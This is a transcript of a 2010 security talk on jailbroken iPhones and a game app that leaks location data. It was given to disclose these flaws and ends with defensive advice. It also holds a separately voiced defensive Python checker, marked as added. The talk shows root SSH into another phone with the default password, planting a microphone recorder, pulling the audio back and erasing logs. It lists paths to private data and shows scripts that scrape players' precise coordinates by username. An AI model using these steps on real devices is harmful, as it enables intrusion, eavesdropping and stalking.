the new world of smartphone security

Post on 15-Jan-2015


The New World of Smartphone Security

What Your iPhone Disclosed About You

Trevor Hawthorn, Managing Partner

Friday, July 9, 2010

Today’s Talk

• “Pockets full of shells”

• “I can see you from my house”

Who I am now


Old Smartphone Best Practices

[Image: devices marked = Bad / = Good]

New Smartphone Best Practices

1. IT will use the iPhone Configuration Utility so you can talk to Exchange, use the VPN, wireless, etc.

2. Get iFart, it’s hilarious.


If AT&T is in attendance:

• Facts about AT&T and me:

• I enjoy my AT&T wireless service

• Feel that I have fantastic coverage everywhere I go at all times

• Am sure you have the largest/fastest 3G network, regardless of what VZW says

• Looking forward to years of receiving quality service from you

• Would love to chat


Jailbreaking

blackra1n

pwnagetool


It opens up a whole new world of applications

• common Unix binaries

• sshd

• tethering

• pirate software

• super easy to JB your phone


Impact on security

“Jail breaking removes 80% of the iPhone’s security precautions”

Charlie Miller, SyScan 2009


How many iPhones are jailbroken?


6.93%

[1]http://www.slideshare.net/pinchmedia/piracy-on-the-appstore


Global Stats


ifconfig

root# ifconfig

lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384

inet 127.0.0.1 netmask 0xff000000

en0: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500

ether 00:21:e9:09:e3:4f

pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450

inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff

pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450

pdp_ip2: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024

pdp_ip3: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024

en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500

inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255

ether 0a:0b:ad:0b:ab:e0


Interfaces

en0 = 802.11 interface

pdp_ip0 = primary cellular interface on APN: wap.cingular

pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail

pdp_ip2 = not sure

pdp_ip3 = used with tethering

ifconfig

pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450

inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff


sshd


So what?


Until (about) October 16, 2009 AT&T did not filter device-to-device IP network traffic.

AT&T’s Network

Most people think it looks like this:

/32


AT&T’s Network

Actually, more like this:

Multiple /16’s


Your smartphone (and laptop/blackberry, etc.) has been on one giant flat network...

So I started looking around...


Devices On the Network

10,589* IPs scanned

Count    Port     What?
8        22       sshd
32       80       http
44       2008     PDANet
3,644    62078    iPhone Default

Other stuff out there

• Saw a Linux box with sshd

• Windows Mobile devices

• Blackberries

• Windows PC’s

• PDANet for the iPhone is an open proxy.


ssh access between phones

Trevors-iPhone:~ root# ssh root@10.69.62.100

Password: [alpine]

Nates-iPhone:~ root#

Nates-iPhone:~ root# id

uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),20(staff),29(certusers),80(admin)


Filesystem Guide

Interesting stuff:

/private/var/mobile/Library/Mail - Email (IMAP, Exchange, POP3, etc.)

/private/var/mobile/Library/SMS - SMS Text Messages

/private/var/mobile/Library/Voicemail - Voicemail in .amr format

/private/var/mobile/Library/AddressBook - Contacts

/private/var/mobile/Library/CallHistory - Call History

/private/var/mobile/Library/Notes - Notes

/private/var/mobile/Library/CallHistory/call_history.db
/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
/private/var/mobile/Library/AddressBook/AddressbookImages.sqlitedb
/private/var/mobile/Library/Cookies/Cookies.plist
/private/var/mobile/Library/Keyboard/dynamic-text.dat
/private/var/mobile/Library/Mail/Accounts.plist
/private/var/mobile/Library/Mail/(mail account name)/Deleted Messages
/private/var/mobile/Library/Mail/(mail account name)/Sent Messages
/private/var/mobile/Library/Mail/(mail account name)/INBOX
/private/var/mobile/Library/Maps/History.plist
/private/var/mobile/Library/YouTube/Bookmarks.plist
/private/var/mobile/Library/Voicemail/(amr files)
/private/var/mobile/Library/Voicemail/voicemail.db
/private/var/mobile/Library/Safari/Bookmarks.plist
/private/var/mobile/Library/Safari/History.plist
/private/var/mobile/Library/Suspend.plist
/private/var/mobile/Library/Safari/SuspendState.plist
/private/var/mobile/Library/Safari/SMS/sms.db
/private/var/mobile/Library/Preference/(various preference Plists)
/private/var/mobile/Library/Notes/notes.db

Let’s do a bit more

Erica Utilities - cmd line utilities for the iPhone

recAudio: Record audio from the onboard microphone.

findme: Queries the iPhone’s GPS API to return latitude/longitude

[Diagram: Attacker (10.69.62.220) pushes recAudio to Victim (10.69.62.100) over scp/ssh and pulls back recording.aiff]

I can hear you typing

Trevors-iPhone:~ root# scp bin/recAudio root@10.69.62.100:

Password:

recAudio 100% 19KB 1.3KB/s 00:00

Trevors-iPhone:~ root# ssh root@10.69.62.100

Password:

Nates-iPhone:~ root# ./recAudio

Start talking. Press ^C to finish.

Starting recording

^C

Interrupted.

Stopping recording


Nates-iPhone:~ root# ls -l *.aiff

-rw-r--r-- 1 root wheel 43178 Oct 2 22:35 2009-10-92\ at\ 22:35:04.aiff

Nates-iPhone:~ root# mv 2009-10-92\ at\ 22:35:04.aiff test.aiff

Trevors-iPhone: root# scp root@10.69.62.100:~/*.aiff .

Password:

test.aiff 100% 523KB 2.2KB/s 00:00

Nates-iPhone:~ root# rm test.aiff recAudio .bash_history

Nates-iPhone:~ root# last

wtmp begins at Fri Oct 2 22:41

Nates-iPhone:~ root#


Other bad things

• ./openURL tel://1-900-XXX-XXX

• ./openURL tel://911 or tel://mynumber

• Pillage filesystem: email, sms, notes, app data, etc.

• apt-get install tcpdump nmap

• go wild on whatever network en0 is connected to.


Worms and Exploits


Dutch Extortion

November 2009


ikee Worm

November 2009


Exploits

• Phone/Privacy.A* command line tool

• Phone/iBotNet.A* worm with C&C

* Discovered by security firm Intego

Some good news

• AT&T does segment part of their network:

• e.g. I could not see a friend in CA from DC

• But I could see a friend in Boston

• No easy way to target a specific individual (mapping an identity to an AT&T NAT IP address is not easy)

• No way to correlate a 10.x.x.x IP to a person via Safari

• decloak.net doesn’t really work in Mobile Safari

• Man this is slow...

email to ID user

<img src="http://10.69.62.220/i.jpg">

[Diagram: the recipient’s phone (10.69.63.110) fetches the image from the sender’s web server (10.69.63.220:80); the server log records src: 10.69.63.110, dst: 10.69.63.220]

What to do

• Don’t Jailbreak your phone if you care about security (sorry)

• Change root and mobile users’ passwords

• Attention Cydia Folks: Do not bind sshd to pdp interfaces; force password change upon install

• IT Folks: Policy on jailbroken iphones

• AT&T: Filter mobile to mobile IP traffic
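As an added defensive check (not code from the talk), here is a short Python script that parses the ifconfig output shown earlier, picks out the cellular (pdp_ip*) addresses, reports whether a given set of sshd ListenAddress entries would leave sshd reachable from the carrier network, and emits ListenAddress lines restricted to loopback and Wi-Fi; the sample output is constructed from the slide and the function names are my own.

```python
import re

# Constructed sample: the ifconfig output from the slide, trimmed to what the
# parser needs (pdp_ip1-3 omitted; they carry no address on the slide).
SAMPLE_IFCONFIG = """\
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
    inet 127.0.0.1 netmask 0xff000000
en0: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500
    ether 00:21:e9:09:e3:4f
pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
    inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
    inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255
"""

IFACE_RE = re.compile(r"^(\w+): flags=")
INET_RE = re.compile(r"^\s+inet (\d+\.\d+\.\d+\.\d+)")

def parse_ifconfig(text):
    """Map interface name -> list of IPv4 addresses (BSD-style ifconfig)."""
    addrs, current = {}, None
    for line in text.splitlines():
        m = IFACE_RE.match(line)
        if m:
            current = m.group(1)
            addrs.setdefault(current, [])
            continue
        m = INET_RE.match(line)
        if m and current is not None:
            addrs[current].append(m.group(1))
    return addrs

def cellular_addresses(addrs):
    """Addresses on pdp_ip* interfaces: these face the carrier's flat network."""
    return [a for name, ips in addrs.items() if name.startswith("pdp_ip") for a in ips]

def sshd_exposed_to_cellular(addrs, listen_addresses):
    """True if sshd would accept connections on a cellular address.
    An empty ListenAddress list is the OpenSSH default: listen everywhere."""
    cell = set(cellular_addresses(addrs))
    if not listen_addresses:
        return bool(cell)
    return any(a in cell or a in ("0.0.0.0", "::") for a in listen_addresses)

def safe_listen_addresses(addrs):
    """sshd_config ListenAddress lines restricted to loopback and Wi-Fi (en*)."""
    keep = [a for name, ips in addrs.items()
            if name == "lo0" or name.startswith("en") for a in ips]
    return ["ListenAddress %s" % a for a in keep]
```

Pinning ListenAddress to a DHCP-assigned Wi-Fi address is brittle when that address changes, so treat the generated lines as a starting point and pair them with the slide's other advice: change the root and mobile passwords.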


Privacy and Location Based Apps


Location Based Apps

• Underworld: Sweet Deal

• Drug trafficking game with candy

• Location matters, move product from point A to point B

• Phone sends high resolution coordinates to game server


Like Druglords


Underworld: Sweetdeal


Google Maps


Paros

• Client side proxy

• Configure the iPhone to use the IP address of the machine running Paros as its proxy

• Watch what your apps send and receive


Request


Response


Used to monitor players


Let’s pick a non-intel agency player

chezk


Request


Response


Lat/Lon to GMaps:


County Records


Facebook


Ok neat, what else?


Near real-time geolocation tracking of players


cURL + perl + crontab = csv + gpsbabel = kml + Google Earth = EPIC screen shots


curl script

#!/bin/sh
#
# First login...
#
curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -d @/home/trevor/iphone/login.xml --dump-header /home/trevor/iphone/headers.txt http://game.dl.a-steroids.com/TrafficServer/
#
# Then update location (re-uses the session cookie saved in headers.txt)
curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/update_loc.xml http://game.dl.a-steroids.com/TrafficServer/
#
# Get GMap objects
curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/gmap_update.xml http://game.dl.a-steroids.com/TrafficServer/

perl script

#!/usr/bin/perl
use strict;
use warnings;

# make single or multiline input into one scalar
my $glob = join('', (<>));

# extract name-to-flag records (/s lets .*? span newlines in the response)
my @records = $glob =~ /(<name>.*?<\/lon>)/igs;

for (@records) {
    my ($name, $lat, $lon) = $_ =~ qr|<name>(.*?)</name>.*?<lat>([\-\d\.]*)</lat><lon>([\-\d\.]*)</lon>|is;
    print "$lat,$lon,$name\n";
}

perl script output

39.93220206723633,-77.47186584472656,poppyseed
38.13753356933594,-77.06847380591797,Gadsden
39.98429718017578,-78.30014190673828,Ziggety
39.23520812988281,-77.40483581542969,Lexi
39.855418395996094,-77.2717056274414,Tatu
39.55705801582031,-77.4004086303711,Bigfoot
36.67790985107422,-77.5902328491211,Jeneko
38.297552490234375,-77.65829467773438,Stilbored
39.891050720214844,-77.55879211025781,Timoteo
39.66313247680664,-78.04374694824219,Gamber
36.295310314697266,-78.14061126700984,UnderWear